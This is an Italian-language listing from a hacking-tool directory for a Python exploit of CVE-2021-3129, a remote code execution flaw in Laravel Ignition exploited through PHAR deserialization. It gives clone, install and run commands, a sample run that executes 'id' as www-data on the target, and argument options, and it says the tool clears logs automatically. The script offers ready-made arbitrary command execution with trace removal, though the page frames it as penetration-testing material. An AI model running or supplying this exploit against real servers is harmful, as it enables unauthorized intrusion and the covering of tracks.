Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-3129 — Exploit Python per CVE-2021-3129 che automatizza la deserializzazione PHAR per eseguire comandi arbitrari su endpoint Laravel Ignition vulnerabili. | Kitploit
Strumenti/GitHubGitHub/0x0d3ad/cve-2021-3129
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

Exploit Python per CVE-2021-3129 che automatizza la deserializzazione PHAR per eseguire comandi arbitrari su endpoint Laravel Ignition vulnerabili.

Vedi Repository
1011 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-3129 Exploit RCE per Laravel Ignition

Questo è uno script di exploit Python per CVE-2021-3129, una vulnerabilità di esecuzione remota di codice in Laravel quando il pacchetto Ignition è installato. Questa vulnerabilità consente a un attaccante di eseguire comandi di sistema arbitrari tramite deserializzazione PHAR.

Funzionalità

  • Genera automaticamente il payload PHAR usando phpggc
  • Accetta input utente per qualsiasi comando da eseguire (es. id, whoami, ecc.)
  • Automatizza l'intero processo di sfruttamento, inclusi la pulizia dei log, l'iniezione del payload, la conversione dei log in PHAR e l'attivazione della deserializzazione

Prerequisiti

  • Python 3.x
  • libreria requests
  • PHP installato sul tuo sistema
  • phpggc installato (per generare payload PHAR)

Installazione

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. Installa i pacchetti Python richiesti:

    root@kitploit:~
    pip install requests
    
  3. Esegui lo script con il target e il comando desiderati:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    Esempio di output:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

Argomenti

  • target (obbligatorio): L'URL dell'applicazione Laravel vulnerabile.
  • --cmd (opzionale): Il comando da eseguire sul target (default: whoami).
  • --log_path (opzionale): Il percorso del file di log da usare (default: ../storage/logs/laravel.log).

POC

POC

POC

Scarica lo strumento